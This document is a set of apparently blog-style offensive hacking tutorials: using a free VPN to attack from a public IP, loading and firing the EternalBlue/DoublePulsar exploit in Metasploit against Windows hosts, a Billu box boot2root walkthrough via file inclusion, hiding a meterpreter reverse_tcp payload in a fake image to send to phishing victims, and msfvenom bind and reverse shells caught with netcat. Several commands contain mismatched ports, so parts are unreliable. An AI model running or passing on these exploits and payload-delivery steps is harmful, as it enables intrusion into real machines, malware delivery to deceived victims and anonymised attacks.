How to use Public IP on Kali Linux

Today through this article you will learn how an attacker can use anonymous VPN service to occupy public IP which will surly expand the area of your target list and you will be able to attack outside your network also.
Let’s Start!
In your kali Linux Open the terminal and type following command to start pptp service for VPN configuration.

apt-get install network-manager-pptp


apt-get install network-manager-pptp-gnome


Ipjetable.net is the web site which provides free VPN service to their registered users but this site will open through proxy server so therefore I took help of free-proxy.xyz to open ipjettable.net web page.


Here you need to unlock the website so that you can use open vpn service anonymously. Click on I subscribe tab. Here I had Google translator.


Then it requires registration for unlocking VPN service now gives your email id for registration. I had use temporary email id for registration.


When you will register into web site it will send you a mail in your inbox which contains username and password that we will use for VPN login. In given screenshot you can observe we have highlighted the link, copy this link.


Now past above copied link inside free-proxy.xyz as done above for unlocking login page for VPN service.
When you will unlock it, the given below web page will gets open inside browser which will ask for login credential now give username and password which have received through mail.


Now click on install ipjetable which start VPN service installation for your local network.


Inside your kali Linux click on power icon available on right side corner of screen to configuration VPN then select wired connected.


Now click on (+) “plus” to add new network connection.


Select point to point tunneling protocol


Now add username and password to connect which VPN server. Then click on advance tab and select radio button store password only for this user.


From given screenshot select the check box for PPTP authentication and encryption then once all configurations is completed click on ok. Till here we have configured VPN service successfully in our kali linux.


Let check our vpn IP that we have occupied 
Ifconfig
From screenshot you can read 192.168.0.102 is my local ip and 141.255.151.15 is our public IP now use this IP for your attack even outside of your network also.

Exploit Remote Windows PC with Eternalblue & Doublepulsar Exploit in Metasploit

Through this article we are sharing recent zero day exploit which requires metasploit framework to shoot any other windows based system. This exploit is combination of two tools “Eternal Blue” which is use as backdooring in windows and “Doublepulsar” which is used for injecting dll file with the help of payload. So we will manually add this exploit in metasploit framework and step up for attacking window server 2008.

Attacker: kali Linux
Target: window 7 and window server 2008

Let’s Start!
Open the terminal in Kali Linux and type following command to download this exploit from git hub.

Git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git


Once the required exploit will get downloaded then open the folder and copy Eternal Blue- Doublepulsar .rb ruby file so that we can add this exploit inside metasploit.


Now past the copied ruby file inside given path Usr/share/metasploit Framework /module/exploits/windows/smb which will add this exploit inside metasploit framework.


Then load metasploit framework to start and type following for testing zero day exploit
Msfconsole
This module exploits vulnerability on SMBv1 and SMBv2 protocols through eternalblue. After that doublepulsar is used to inject remotely a malicious dll.
Use windows/smb/eternalblue_doublepulsar
Msf exploit (eternalblue_doublepulsar)> set eternalbluepath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps
Msf exploit (eternalblue_doublepulsar)> set doublepulsarpath /root/Desktop/ eternalblue_doublepulsar-metasploit/deps
Msf exploit (eternalblue_doublepulsar)>set targetarchitecture x64
Msf exploit (eternalblue_doublepulsar)>set processinject lsass.exe
Msf exploit (eternalblue_doublepulsar)>set lhost 192.168.1.6
Msf exploit (eternalblue_doublepulsar)>set rhost 192.168.1.104
Msf exploit (eternalblue_doublepulsar)>exploit

Hence from screenshot you can observer only we need to set target’s architecture and IP before launching exploit and then when all information is set then launch your attack which will give you meterpreter session successfully like I have owned.


Hack the billu: b0x VM (Boot2root Challenge)

Hi friends! Once again we are here with a new vulnerable lab challenge “Billu Box” .created by Manish Kishan Tanwar  It is very simple and easy especially for beginners to complete the challenges, mainly attacker need to escalate privileges to gain root access. You can download it from here.

Let’s breach!!!

Open the terminal in your Kali Linux scan your network using netdiscover command and hence from scanning result I got target IP 192.168.1.102


Then use nmap aggressive scan for port and protocol enumeration:
Nmap –p- -A 192.168.0.102
So here I found port 22 and 80 are opened for SSH and HTTP respectively.


Since port 80 is open so I explore target IP on browser but here I didn’t get any remarkable result.


Without wasting time I choose another tool dirb for directories brute force attack. To start brute force attack for directories

Awesome! We have stepped up in right direction and dug out many directories but when you will see the given screenshot there I had highlighted the “test” directories. So now I will go with test directory.


So when I open test.php file in the browser here I found a message “file parameter is empty please provide file path in file parameter” where file parameter is vulnerable to LFI.

Using hackbar tool which is Firefox plug-in and Taking advantage of LFI vulnerability I try to include index.php in file parameter from file=index.php


So when I open index.php file here I found another file c.php is included.


So again with help of hackbar I look for c.php file from file=c.php for further enumeration so that we can find some clue to exploit the target.


When I read c.php file here I got some information related to connected database and the highlighted text is reflecting like credential for database.


If you remembered the result of dirb tool here it had revealed another directory which is phpmy so therefore I will go with phpmy for further enumeration.


Then again taking advantage LFI I explore config.inc.php from file=/var/www/phpmy/config.inc.php


Last but not least we have finally achieve something very remarkable and in the given screenshot you can read from config.inc.php file I have found server’s login username and password root: toor respectively.


From port enumeration result we have found port 22 is open for ssh therefore I will try root: toor for ssh login. When I use these credential for ssh login successfully I got root access hence the given challenge is completed.

Embedded Backdoor with Image using FakeImageExploiter

In this article we are introducing a newly launched hacking tool “Fake Image Exploiter”. It is design so that it becomes easier for attackers to perform phishing or social engineering attacks by generating a fake image with hidden malicious .bat/.exe file inside it.

Let’s start!
Open the terminal inside your kali Linux and type following command to download it from github.

Git clone https://github.com/r00t-3xp10it/FakeImageExploiter.git


Once it gets downloaded then opens the folder and selects the file “settings” for configuration before running the program as shown the given screenshot.


Now made some changes inside setting file as shown the screenshot:
Here you have to declare the type of payload extension you will use to hide it inside the image. You can set any exetension among these four : ps1, bat, txt, exe.  I had set PAYLOAD_EXETNSION=bat similarly set BYPASS_RH=NO  and scroll down for next configration.


In same way set these two values also as shown in screenshot then save the changes.
AUTO_PAYLOAD_BUILD=YES
AGENT_HANLER_PORT=4444


After making certain changes in setting file then open the terminal and run the program file:
Cd FakeImageExploiter
./ FakeImageExploiter.sh


Click on YES to execute framework.


Select payload to build as I had choose window/meterpreter/reverse_tcp for attack.


After then a pop up box will open which will allow choosing any jpg image so that it could hide .bat file payload inside that image.


Now select icon for your malicious image. 


Give a name to your payload which will be display to victim as file name, from screenshot you can see I had given sales.


Now it generates a link as you can observe it from highlighted part of screenshot and then send this link to victim. Now victim will download the zip file and click on the sales.jpg.


When victim will click on sales.jpg, we will get meterpreter session at the background on metasploit framework.

2 ways to use Msfvenom Payload with Netcat

In this article you will learn how we can connect with victim through netcat shell using msfvenom payload. There will be two different ways for hacking any system using msfvenom with netcat.

1st Method
Firstly open the terminal and type following command for msfvenom which generate an exe payload:

Msfvenom –p windows/shell_hidden_bind_tcp ahost=192.168.0.107 lport=8956 –f exe > /root/Desktop/root.exe


Then send this root.exe file to victim and open other terminal for netcat shell and type following command:
nc 192.168.0.103 89565
When victim will click on root.exe file attacker will get access of victim’s system.


2nd Method
Again open the terminal type following command for msfvenom which generate an exe payload:
Msfvenom –p windows/shell_reverse_tcp  lhost=192.168.0.107 lport=888 –f exe > /root/Desktop/1.exe


Then send this 1.exe file to victim and open other terminal for netcat shell and type following command:
nc -lvp 8888
When victim will click on 1.exe file attacker will get reverse connection of victim’s system.